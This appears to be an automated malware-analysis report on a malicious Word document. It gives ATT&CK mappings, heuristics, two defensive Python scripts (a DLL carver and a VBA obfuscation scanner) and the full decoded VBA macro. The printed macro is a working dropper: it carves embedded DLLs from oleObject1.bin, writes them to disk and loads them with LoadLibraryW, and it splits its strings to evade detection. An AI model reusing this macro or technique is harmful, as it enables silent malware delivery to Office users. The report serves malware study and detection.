Verdict: MALICIOUS (risk score 370)

Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1106 Native API (listed under its former name, Execution through API)
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document whose VBA project starts from a Document_Open subroutine (Module3.AppStart). Despite the "Shell call" heuristic, the macro never launches a command: it creates WScript.Shell only to resolve an environment variable and a special-folder path whose names are held in UserForm2 TextBox Tag properties rather than in the code, and Shell.Application only to unzip. Once UserForm1 is shown, its Activate handler runs StartRecovery, which re-saves the open document in Office Open XML format (FileFormat 13) under the name videmem.docx.zip, copies word\embeddings\oleObject1.bin out of that archive, and carves a fixed-size block (278528 bytes from the first MZ header on 32-bit Office, 246272 bytes from the second on 64-bit, implying the object carries both DLLs back to back) into scheduler_a.dll or scheduler_b.dll in the special folder. It then loads that file through a Declare'd LoadLibraryW (PORDMN2) and calls the export PORDMN (ZooDcom); because the DLL is already mapped by full path, the Declare's bare module name resolves to it, so the payload runs inside the Office process with no child process and no WScript.Shell.Run. The macro source contains no GetProcAddress or VirtualAlloc strings; those hits, like the embedded PE, belong to the carried binaries, which are the second stage. Most of the remaining modules (chart, HTML-parsing, FMOD audio and text-rendering code with unresolvable dotted names such as Bl.obs and GetRan.domInteger) are dead filler that is never reached from Document_Open. The embedded executable is the primary IOC; scheduler_a.dll / scheduler_b.dll, videmem.docx, videmem.docx.zip and oleObject1.bin in the resolved folders are the host-side artifacts to hunt for.
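To obtain the DLLs without detonating the document, the carving step can be replayed offline against the oleObject1.bin that sits inside the document's .zip container. The script below is an added example written for this report; it is not code from the sample or from the analyzer. It mirrors DonHuan() byte for byte (including its no-rewind quirk, which a naive search for "MZ\x90" does not share), uses the sizes and header indices copied from StartRecovery(), and adds the PE-signature sanity check a practitioner would run on the result. The small PE look-alikes and the blob they are embedded in are constructed test data.

```python
"""Offline re-implementation of the carving step in the extracted macro.

StartRecovery() re-saves the open document as a .zip, copies
word\\embeddings\\oleObject1.bin out of it with Shell.Application, and
DonHuan() then reads that file one byte at a time looking for CByte(77),
CByte(90), CByte(144), i.e. "MZ\\x90".  It skips to the index-th match
(1 on 32-bit Office, 2 on 64-bit), copies a fixed number of bytes from the
match, and writes them to scheduler_a.dll / scheduler_b.dll, which are then
loaded with LoadLibraryW and entered through the exported PORDMN.

Added example, not code from the sample or the analyzer; the PE look-alikes
below are constructed test data.
"""
import hashlib
import struct
import sys
from typing import Dict, Optional

# Per-architecture parameters copied from StartRecovery() in the macro.
ARCH_PARAMS = {
    "x86": {"dll": "scheduler_a.dll", "size": 278528, "index": 1},
    "x64": {"dll": "scheduler_b.dll", "size": 246272, "index": 2},
}


def carve_like_donhuan(blob: bytes, index: int, size: int) -> Optional[bytes]:
    """Mirror DonHuan(): consume bytes one at a time, count "MZ\\x90" hits and
    return `size` bytes (marker included) starting at the index-th hit.

    The macro never rewinds: after an 'M' it consumes the next byte as the 'Z'
    candidate, and after 'MZ' the next byte as the 0x90 candidate, so
    "MMZ\\x90" or "MZMZ\\x90" are NOT hits for it.  That quirk is kept on purpose
    so the bytes returned here are the bytes the macro writes to disk.
    If the blob ends early the result is simply shorter than `size`.
    """
    pos, hits, n = 0, 0, len(blob)
    while pos < n:
        b = blob[pos]
        pos += 1
        if b != 0x4D:               # 'M'
            continue
        if pos >= n:
            break
        b = blob[pos]
        pos += 1
        if b != 0x5A:               # 'Z'
            continue
        if pos >= n:
            break
        b = blob[pos]
        pos += 1
        if b != 0x90:
            continue
        hits += 1
        if hits == index:
            start = pos - 3
            return blob[start:start + size]
    return None


def looks_like_pe(data: bytes) -> bool:
    """Sanity check on a carved block: MZ magic and e_lfanew pointing at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def carve_all(blob: bytes, params=ARCH_PARAMS) -> Dict[str, Optional[dict]]:
    """Carve what the macro would write for every architecture in `params`."""
    out = {}
    for arch, p in params.items():
        data = carve_like_donhuan(blob, p["index"], p["size"])
        out[arch] = None if data is None else {
            "dll": p["dll"],
            "data": data,
            "sha256": hashlib.sha256(data).hexdigest(),
            "pe_ok": looks_like_pe(data),
        }
    return out


# --- constructed test data (not from the sample) ---------------------------
def fake_pe(size: int, tag: bytes) -> bytes:
    """Stand-in for a PE image: MZ magic, e_lfanew = 0x40, PE signature, filler."""
    hdr = b"MZ\x90\x00" + b"\x00" * 0x38 + struct.pack("<I", 0x40) + b"PE\x00\x00" + tag
    return hdr.ljust(size, b"\x00")


SAMPLE_BLOB = (
    b"\x01\x00\x00\x00some header text\x00"
    + b"MMZ\x90 decoy"                 # a naive search counts this; the macro does not
    + fake_pe(0x200, b"x86")
    + b"\xAA" * 17
    + fake_pe(0x180, b"x64")
    + b"trailer"
)
SAMPLE_PARAMS = {
    "x86": {"dll": "scheduler_a.dll", "size": 0x200, "index": 1},
    "x64": {"dll": "scheduler_b.dll", "size": 0x180, "index": 2},
}

if __name__ == "__main__":
    # Usage: python carve.py oleObject1.bin   (falls back to the constructed blob)
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    params = ARCH_PARAMS if len(sys.argv) > 1 else SAMPLE_PARAMS
    for arch, r in carve_all(blob, params).items():
        if r is None:
            print(f"{arch}: MZ header #{params[arch]['index']} not found")
        else:
            print(f"{arch}: {r['dll']} {len(r['data'])} bytes sha256={r['sha256']} pe_ok={r['pe_ok']}")
```

Run it against the real oleObject1.bin (or the ole10native_00_basecamp payload carved above) with the default ARCH_PARAMS to get the two DLL hashes for blocklisting; a pe_ok of False on either slot means the macro's hard-coded offsets no longer line up with the object and the file it drops would be corrupt.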
Heuristics (11)

| Heuristic | Severity | Rule | Detail |
|---|---|---|---|
| Office EPRINT stream contains EMF object | high | OLE_EPRINT_EMF_OBJECT | The OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is consistent with Office object delivery when paired with exploit-payload anomalies, but the malformed graphics record needed for an exact CVE attribution is not proven by this rule alone. |
| Embedded PE executable | critical | OLE_EMBEDDED_EXE | MZ/PE header found inside the document; possible embedded executable. |
| VBA macros detected | medium (3 related findings) | OLE_VBA_MACROS | Document contains VBA macro code. |
| Potential Shell call in VBA | critical | OLE_VBA_SHELL | Matched line: `Set PointerNull = CreateObject("WScri" + "pt.Shell")`. The object is only used for ExpandEnvironmentStrings and SpecialFolders; the macro never calls Shell() or WScript.Shell.Run and launches its payload through LoadLibraryW instead. |
| CreateObject call | high | OLE_VBA_CREATEOBJ | Matched line: `Set PointerNull = CreateObject("WScri" + "pt.Shell")`. A second `CreateObject("Shell." + "Application")` in StartRecovery extracts oleObject1.bin from the re-saved document. |
| Document_Open macro | low | OLE_VBA_DOCOPEN | Matched line: `Private Sub Document_Open()` |
| Reference to LoadLibrary API | high | SC_STR_LOADLIBRARY | Declared in Module3 as PORDMN2 (Lib "kernel32" Alias "LoadLibraryW") and called on the dropped DLL. |
| Reference to GetProcAddress API | high | SC_STR_GETPROCADDRESS | Not present in the macro source; the string originates in the embedded binaries. |
| Suspicious extracted artifact | high | EXTRACTED_FILE_STATIC_TRIAGE | One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. |
| Reference to VirtualAlloc API | medium | SC_STR_VIRTUALALLOC | Not present in the macro source; the string originates in the embedded binaries. |
| Embedded URL | info | EMBEDDED_URL | http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). The URL itself is not a detection; this one is the standard DrawingML namespace. See the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |
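The Shell and CreateObject rules above fired even though the macro splits every sensitive literal (`"WScri" + "pt.Shell"`, `"\ole" + "Obj" + "ect*.bin"`, `"word\e" + "mbed" + "dings\oleObject1.b" + "in"`), so a plain substring search would miss them. The scanner below is an added example, not the analyzer's own rule logic and not part of the sample: it folds adjacent VBA string literals joined by `+` or `&` back into one literal before matching. The token watch-list is an assumption chosen for this page; the sample lines are copied from Module3 and Module5 of the macro shown further down.

```python
"""Heuristic that survives the literal-splitting seen in this macro.

Added example written for this report; not the analyzer's rule logic and not
part of the sample.  SUSPICIOUS is an assumed watch-list.
"""
import re
from typing import Dict, List

# "lit1" + "lit2"  or  "lit1" & "lit2"  ->  "lit1lit2"
# Does not handle the VBA escaped quote ("") inside a literal; such literals are left as they are.
_CONCAT = re.compile(r'"([^"]*)"\s*[+&]\s*"([^"]*)"')

# Assumed watch-list; extend for your own environment.
SUSPICIOUS = [
    "wscript.shell", "shell.application", "createobject", "loadlibrary",
    "oleobject", "embeddings", ".dll", ".docx", ".zip",
]


def normalize_concat(line: str) -> str:
    """Repeatedly merge adjacent literals so chains of any length collapse."""
    while True:
        merged = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', line)
        if merged == line:
            return merged
        line = merged


def scan_vba(lines: List[str], normalize: bool = True) -> Dict[int, dict]:
    """Return {1-based line number: {"normalized": str, "tokens": [...]}} for lines that hit.

    With normalize=False the raw line is matched, which shows what a plain
    substring rule would (not) see on this sample.
    """
    hits = {}
    for no, raw in enumerate(lines, 1):
        text = normalize_concat(raw) if normalize else raw
        low = text.lower()
        found = [t for t in SUSPICIOUS if t in low]
        if found:
            hits[no] = {"normalized": text, "tokens": found}
    return hits


# Lines copied from the extracted macro (Module3 / Module5); the last one is a benign control.
SAMPLE_LINES = r'''
Set PointerNull = CreateObject("WScri" + "pt.Shell")
TextBox1Tag = UserForm2.TextBox1.Tag & "\videmem" + ".d" + "ocx"
OpenForBinaryLock = OpenForBinaryLock + ".d" + "ll"
KillArray ZipFolder & "\ole" + "Obj" + "ect*.bin", ZipName, OpenForBinaryLock
Set oApp = CreateObject("Shell." + "Application")
oApp.Namespace(ZipFolder).CopyHere objFolder.items.Item("word\e" + "mbed" + "dings\oleObject1.b" + "in")
Dim SpecialPath As String
'''.strip().splitlines()

if __name__ == "__main__":
    for no, h in scan_vba(SAMPLE_LINES).items():
        print(f"line {no}: {h['tokens']}  <- {h['normalized']}")
```

Feed it the output of `olevba` (or the macros.bas carved below) one line at a time; comparing `scan_vba(lines)` with `scan_vba(lines, normalize=False)` shows exactly which indicators the splitting was meant to hide.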
Extracted artifacts (4)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 61447 bytes | 7f0529553e623a02cc5a75dfc506a97e689613feab79387fb19fcb1ce4b8535b |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If UserForm1.Visible = False Then
Module3.AppStart
End If
End Sub
Attribute VB_Name = "Module1"
Public Sub SetArrayItemValue(arr, index1 As Integer, val1 As Byte)
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D44A6C26-B731-485B-9B7C-9987CED175DF}{89B7CD74-5346-4A98-B474-EAA43A5CA147}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()
End Sub
Private Sub UserForm_Activate()
DoEvents
StartRecovery
End Sub
Private Sub UserForm_Initialize()
d = SystemButtonSettings(Me, False)
End Sub
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{9A8A2204-9F34-402A-A010-04445B8579A8}{CA740A1A-7056-4D29-8E3A-D10BF0078855}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module2"
Public CursorPosition() As Long
Public Function SetResourceBytes(lpType As Long, lpID As Long, lpData() As Byte, lpFile As String) As Long
Dim pReturn As Long, rPort As Long, nCount As Long
nCount = UBound(lpData) + 1 - LBound(lpData)
pReturn = BeginUpdate.Resource(lpFile, False)
If pReturn <> 0 Then
rPort = Update.Resource1(pReturn, lpType, lpID, 1033, lpData(LBound(lpData)), nCount)
EndUpdate.Resource pReturn, False
If rPort <> 0 Then SetResourceBytes = True
End If
End Function
Sub ConvertChartToPicture()
Dim Cht As Chart
If ActiveChart Is Nothing Then Exit Sub
If TypeName(ActiveSheet) = "Chart" Then Exit Sub
Set Cht = ActiveChart
Cht.CopyPicture Appearance:=xlPrinter, _
Size:=xlScreen, Format:=xlPicture
End Sub
Sub CreateUnlinkedChart()
Dim MyChart As Chart
Set MyChart = ActiveSheet.Shapes.AddChart2.Chart
With MyChart
.SeriesCollection.NewSeries
.SeriesCollection(1).Name = "Sales"
.SeriesCollection(1).XValues = Array("Jan", "Feb", "Mar")
.SeriesCollection(1).Values = Array(125, 165, 189)
.ChartType = xlColumnClustered
.SetElement msoElementLegendNone
End With
End Sub
Public Sub ReplaceFile(TextBox1Tag)
DoEvents
Application.DisplayAlerts = False
DoEvents
If Val(Application.Version) < 14 Then
ActiveDocument.SaveAs TextBox1Tag, 13
Else
ActiveDocument.SaveAs2 TextBox1Tag, 13
End If
'SaveAs2 TextBox1Tag, FileFormat:=39 + 12
DoEvents
'ActiveDocument.Close
DoEvents
End Sub
Attribute VB_Name = "Module3"
#If Win64 Then
Public Declare PtrSafe Function ZooDcom Lib _
"scheduler_b.dll" Alias "PORDMN" () As Integer
Public Declare PtrSafe Function PORDMN2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
Public Declare Function PORDMN2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Public Declare Function ZooDcom Lib _
"scheduler_a.dll" Alias "PORDMN" () As Integer
#End If
Public Sub AppStart()
Dim PointerNull As Object
Dim SpecialPath As String
Set PointerNull = CreateObject("WScri" + "pt.Shell")
UserForm2.TextBox1.Tag = PointerNull.ExpandEnvironmentStrings("%" + UserForm2.TextBox1.Tag + "%")
UserForm2.TextBox2.Tag = PointerNull.SpecialFolders(UserForm2.TextBox2.Tag)
ChDir (UserForm2.TextBox1.Tag)
UserForm1.show
End Sub
Public Sub DonHuan(DonHuan2 As String, OpenForBinaryLock As String, fl As Long, ChartPosition6 As Integer)
Dim ChartPosition1 As Long, ChartPosition2 As Byte, ChartPosition3 As Byte, ChartPosition4 As Byte
Dim SimpleMethod As Integer
ReDim CursorPosition(1 To fl)
ChartPosition1 = FreeFile
Open DonHuan2 For Binary Access Read As ChartPosition1
Dim cur As Integer
cur = 1
Do While Not EOF(ChartPosition1)
Get ChartPosition1, , ChartPosition2
If ChartPosition2 = CByte(77) Then
CursorPosition(1) = ChartPosition2
Get ChartPosition1, , ChartPosition3
If ChartPosition3 = CByte(90) Then
CursorPosition(2) = ChartPosition3
Get ChartPosition1, , ChartPosition4
If ChartPosition4 = CByte(144) Then
CursorPosition(3) = ChartPosition4
If cur = ChartPosition6 Then
For k = 4 To fl
Get ChartPosition1, , ChartPosition2
CursorPosition(k) = ChartPosition2
Next k
Exit Do
Else
cur = cur + 1
End If
End If
End If
End If
Loop
Close ChartPosition1
ChartPosition1 = FreeFile
Open OpenForBinaryLock For Binary Lock Read Write As #ChartPosition1
For i = LBound(CursorPosition) To UBound(CursorPosition)
If UserForm1.Enabled = True Then
NumberBuffer ChartPosition1, CByte(CursorPosition(i))
End If
Next i
Close #ChartPosition1
End Sub
Public Function ITestModule_GetCase(ByVal lIndex As Long)
On Error Resume Next
If tracemod Then
g_errorobj.Transmit "Inside: ITestModule_GetCase(" + CStr(lIndex) + ")" + Chr(10)
End If
numcases = numcases + 1
Select Case lIndex
Case 0
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")
Case 1
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cndefdat")
Case 2
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnexec")
Case 3
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnmode")
Case 4
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnopen")
Case 5
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprop")
Case 6
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprovider")
Case 7
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnstring")
Case 8
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cntimeout")
Case 9
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldactualsize")
End Select
End Function
Attribute VB_Name = "Module4"
Public Function Load(HTMLSource As Variant) As Boolean
On Error GoTo ErrorTrap
Const Chunk = 1000
Dim WorkingSrc As String
Dim TagStart As Long
Dim TagEnd As Long
Dim TagLength As Long
Dim TagStartString As String
Dim splittest() As String
Dim Ptr As Long
Dim Cnt As Long
Dim Pos As Long
Dim testing As Boolean
Dim PosScriptEnd As Long
Dim PosEndScript As Long
Dim PosEndScriptEnd As Long
WorkingSrc = HTMLSource
LocalElementCount = 0
LocalElementSize = 0
ReDim LocalElements(LocalElementSize)
If NewWay Then
Load = True
Ptr = 0
Do
BlobSN = "/blob" & CStr(GetRan.domInteger()) & ":"
Ptr = Ptr + 1
Loop While ((InStr(1, WorkingSrc, BlobSN, vbTextCompare) <> 0) And (Ptr < 10))
splittest = Split(WorkingSrc, "<script")
Cnt = UBound(splittest) + 1
If Cnt > 1 Then
For Ptr = 1 To Cnt - 1
PosScriptEnd = InStr(1, splittest(Ptr), ">")
If PosScriptEnd > 0 Then
PosEndScript = InStr(PosScriptEnd, splittest(Ptr), "</script", vbTextCompare)
If PosEndScript > 0 Then
Bl.obs(BlobCnt) = Mid(splittest(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1)
splittest(Ptr) = Mid(splittest(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mid(splittest(Ptr), PosEndScript)
BlobCnt = BlobCnt + 1
End If
End If
Next
WorkingSrc = Join(splittest, "<script")
End If
splittest = Split(WorkingSrc, "<style")
Cnt = UBound(splittest) + 1
If Cnt > 1 Then
For Ptr = 1 To Cnt - 1
PosScriptEnd = InStr(1, splittest(Ptr), ">")
If PosScriptEnd > 0 Then
PosEndScript = InStr(PosScriptEnd, splittest(Ptr), "</style", vbTextCompare)
If PosEndScript > 0 Then
Blo.bs(BlobCnt) = Mid(splittest(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1)
splittest(Ptr) = Mid(splittest(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mid(splittest(Ptr), PosEndScript)
BlobCnt = BlobCnt + 1
End If
End If
Next
WorkingSrc = Join(splittest, "<style")
End If
Exit Function
End If
ErrorTrap:
Call Handle.Error("Load", Err.Number, Err.Source, Err.Description)
End Function
Public Sub Text_Write(progbar As Object, tmptext As String, tmpSpalte As Long, tmpZeile As Long, tmpcolor As Long)
For i = 1 To Len(tmptext)
If TextClockWise = True Then
For x = tmpSpalte To tmpSpalte + UBound(ZeichenArray, 1)
For y = tmpZeile - Letter.Position + Letter.FontHeight - 1 To tmpZeile - Letter.Position - UBound(ZeichenArray, 2) + Letter.FontHeight - 1 Step -1
OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1)
OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1))
If ZeichenArray(x - tmpSpalte, tmpZeile - Letter.Position + Letter.FontHeight - 1 - y) Then
Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False
Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255
Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255
Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255
Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0)
End If
Next y
Next x
Else
OldLetter.ArrayRGB(ZeichenAnzahl - 1).Left = tmpSpalte
OldLetter.ArrayRGB(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position
OldLetter.ArraySW(ZeichenAnzahl - 1).Left = tmpSpalte
OldLetter.ArraySW(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position
For x = tmpSpalte To tmpSpalte - UBound(ZeichenArray, 1) Step -1
For y = tmpZeile + Letter.Position To tmpZeile + Letter.Position + UBound(ZeichenArray, 2)
OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1)
OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile - Letter.Position) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1))
If ZeichenArray(tmpSpalte - x, y - tmpZeile - Letter.Position) Then
Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False
Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255
Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255
Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255
Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0)
End If
Next y
Next x
End If
progbar.Value = i
Next i
progbar.Value = 0
Dra.w_Zoom picsource, pictarget
End Sub
Attribute VB_Name = "Module5"
Public Sub StartRecovery()
TextBox1Tag = UserForm2.TextBox1.Tag & "\videmem" + ".d" + "ocx"
ZipName = TextBox1Tag + ".zip"
ZipFolder = UserForm2.TextBox1.Tag
Dim OpenForBinaryLock As String
Dim Big_Size As Long
Dim UpdateParameter As Integer
OpenForBinaryLock = UserForm2.TextBox2.Tag + "\scheduler_a"
Big_Size = 278528
UpdateParameter = 1
#If Win64 Then
OpenForBinaryLock = UserForm2.TextBox2.Tag + "\scheduler_b"
Big_Size = 246272
UpdateParameter = 2
#End If
OpenForBinaryLock = OpenForBinaryLock + ".d" + "ll"
KillArray ZipFolder & "\ole" + "Obj" + "ect*.bin", ZipName, OpenForBinaryLock
ReplaceFile ZipName
ReplaceFile TextBox1Tag
'FileCopy TextBox1Tag, ZipName
Dim objFolder As Object
Set oApp = CreateObject("Shell." + "Application")
If UpdateParameter > 0 Then
Set objFolder = oApp.Namespace(ZipName)
oApp.Namespace(ZipFolder).CopyHere objFolder.items.Item("word\e" + "mbed" + "dings\oleObject1.b" + "in")
End If
DonHuan ZipFolder + "\oleObject" + "1.b" + "in", OpenForBinaryLock, Big_Size, UpdateParameter
If UpdateParameter > 0 Then
UpdateParameter = UpdateParameter + 1
ChDir (UserForm2.TextBox2.Tag)
UpdateParameter = UpdateParameter + 1
End If
PORDMN2 (OpenForBinaryLock)
If UpdateParameter > 0 Then
UpdateParameter = UpdateParameter + 1
UpdateParameter = UpdateParameter + 1
End If
If UpdateParameter < 0 Then
UpdateParameter = UpdateParameter + 1
UpdateParameter = UpdateParameter + 1
End If
ZooDcom
End Sub
Public Function GetParamCount() As Integer
On Error Resume Next
Dim i As Long
Dim sNextChar As String
Dim bInside As Boolean
Dim bQuoted As Boolean
Dim sCommand As String
GetParamCount = 0
bInsideParameter = False
bQuoted = False
sCommand = Command$
For i = 1 To Len(sCommand)
sNextChar = Mid$(sCommand, i, 1)
If bInsideParameter Then
If bQuoted Then
If sNextChar = """" Then
GetParamCount = GetParamCount + 1
bInsideParameter = False
bQuoted = False
End If
Else
If sNextChar = " " Then
GetParamCount = GetParamCount + 1
bInsideParameter = False
bQuoted = False
End If
End If
Else
bInsideParameter = True
If sNextChar = """" Then
bQuoted = True
ElseIf sNextChar <> " " Then
bQuoted = False
End If
End If
Next i
If bInsideParameter Then GetParamCount = GetParamCount + 1
End Function
Attribute VB_Name = "Module6"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000
#If VBA7 Then
Private Declare PtrSafe Function GetWindowLong _
Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _
ByVal nIndex As Long) As Long
Private Declare PtrSafe Function BoxWSL _
Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _
ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare PtrSafe Function FindWindowA _
Lib "user32" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare PtrSafe Function DrawMenuBar _
Lib "user32" (ByVal parameter1 As Long) As Long
#Else
Private Declare Function GetWindowLong _
Lib "user32" Alias "GetWindowLongA" ( _
ByVal parameter1 As Long, ByVal nIndex As Long) As Long
Private Declare Function BoxWSL _
Lib "user32" Alias "SetWindowLongA" ( _
ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function FindWindowA _
Lib "user32" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare Function DrawMenuBar _
Lib "user32" (ByVal parameter1 As Long) As Long
#End If
Public Sub KillArray(ParamArray PathList() As Variant)
On Error Resume Next
For Each Key In PathList
Kill Key
Next Key
On Error GoTo 0
End Sub
Public Function SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long
windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)
If show Then
BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)
Else
BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)
End If
DrawMenuBar (windowHandle)
SystemButtonSettings = 7
End Function
Public Sub NumberBuffer(Number As Long, Buffer As Byte)
If UserForm1.Enabled = True Then
Put #Number, , Buffer
End If
End Sub
Private Sub cmdStart_Click()
Dim System As Long
Dim Sound As Long
Dim result
Dim Version As Long
Dim Data(0 To 4095) As Byte
Dim Length As Long
Dim Read As Long
Dim bytesread As Long
Dim outfp As Long
result = FMOD_Syst.em_Create(System)
ERRCHECK (result)
result = FMOD_Syst.em_GetVersion(System, Version)
ERRCHECK (result)
If Version <> FMOD_VERSION Then
MsgBox "Error! You are using an old version of FMOD " & Hex$(Version) & ". " & _
"This program requires " & Hex$(FMOD_VERSION)
End If
result = FMOD_Sys.tem_Init(System, 1, FMOD_INIT_NORMAL, 0)
ERRCHECK (result)
result = FMOD_Sys.tem_CreateStream(System, "../../examples/media/wave.mp3", FMOD_OPENONLY Or FMOD_ACCURATETIME, Sound)
ERRCHECK (result)
result = FMOD_Soun.d_GetLength(Sound, Length, FMOD_TIMEUNIT_PCMBYTES)
ERRCHECK (result)
Open "output.raw" For Random As #1
Close #1
outfp = lO.pen("output.raw", 1)
bytesread = 0
Do
result = FMOD_Soun.d_ReadData(Sound, GetA.ddrOf(Data(0)), 4096, Read)
bytesread = bytesread + Read
Call lW.rite(outfp, GetA.ddrOf(Data(0)), Read)
Loop While (result = FMOD_OK And Read = 4096)
lC.lose (outfp)
result = FMOD_So.und_Release(Sound)
ERRCHECK (result)
result = FMOD_Sys.tem_Close(System)
ERRCHECK (result)
result = FMOD_Sys.tem_Release(System)
ERRCHECK (result)
End Sub
Private Sub cmdExit_Click()
Unload M.E
End
End Sub
Private Sub ERRCHECK(result)
Dim msgResult
If result <> FMOD_OK Then
msgResult = MsgBox("FMOD error! (" & result & ") " & FMOD_Erro.rString(result))
End If
If msgResult Then
End
End If
End Sub
' Processing file: /tmp/qstore_aeeakc_j
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1269 bytes
' Line #0:
' Line #1:
' Line #2:
' FuncDefn (Sub Document_Open())
' Line #3:
' Ld UserForm1
' MemLd Visible
' LitVarSpecial (False)
' Eq
' IfBlock
' Line #4:
' Ld Module3
' ArgsMemCall AppStart 0x0000
' Line #5:
' EndIfBlock
' Line #6:
' Line #7:
' EndSub
' Macros/VBA/Module1 - 1037 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub SetArrayItemValue(arr))
' Line #2:
' Line #3:
' EndSub
' Line #4:
' Line #5:
' Macros/VBA/UserForm1 - 1821 bytes
' Line #0:
' FuncDefn (Sub Label1_Click())
' Line #1:
' Line #2:
' EndSub
' Line #3:
' Line #4:
' FuncDefn (Sub UserForm_Activate())
' Line #5:
' ArgsCall DoEvents 0x0000
' Line #6:
' ArgsCall StartRecovery 0x0000
' Line #7:
' EndSub
' Line #8:
' Line #9:
' FuncDefn (Sub UserForm_Initialize())
' Line #10:
' Ld id_FFFF
' LitVarSpecial (False)
' ArgsLd SystemButtonSettings 0x0002
' St d
' Line #11:
' Line #12:
' EndSub
' Line #13:
' Macros/VBA/UserForm2 - 1181 bytes
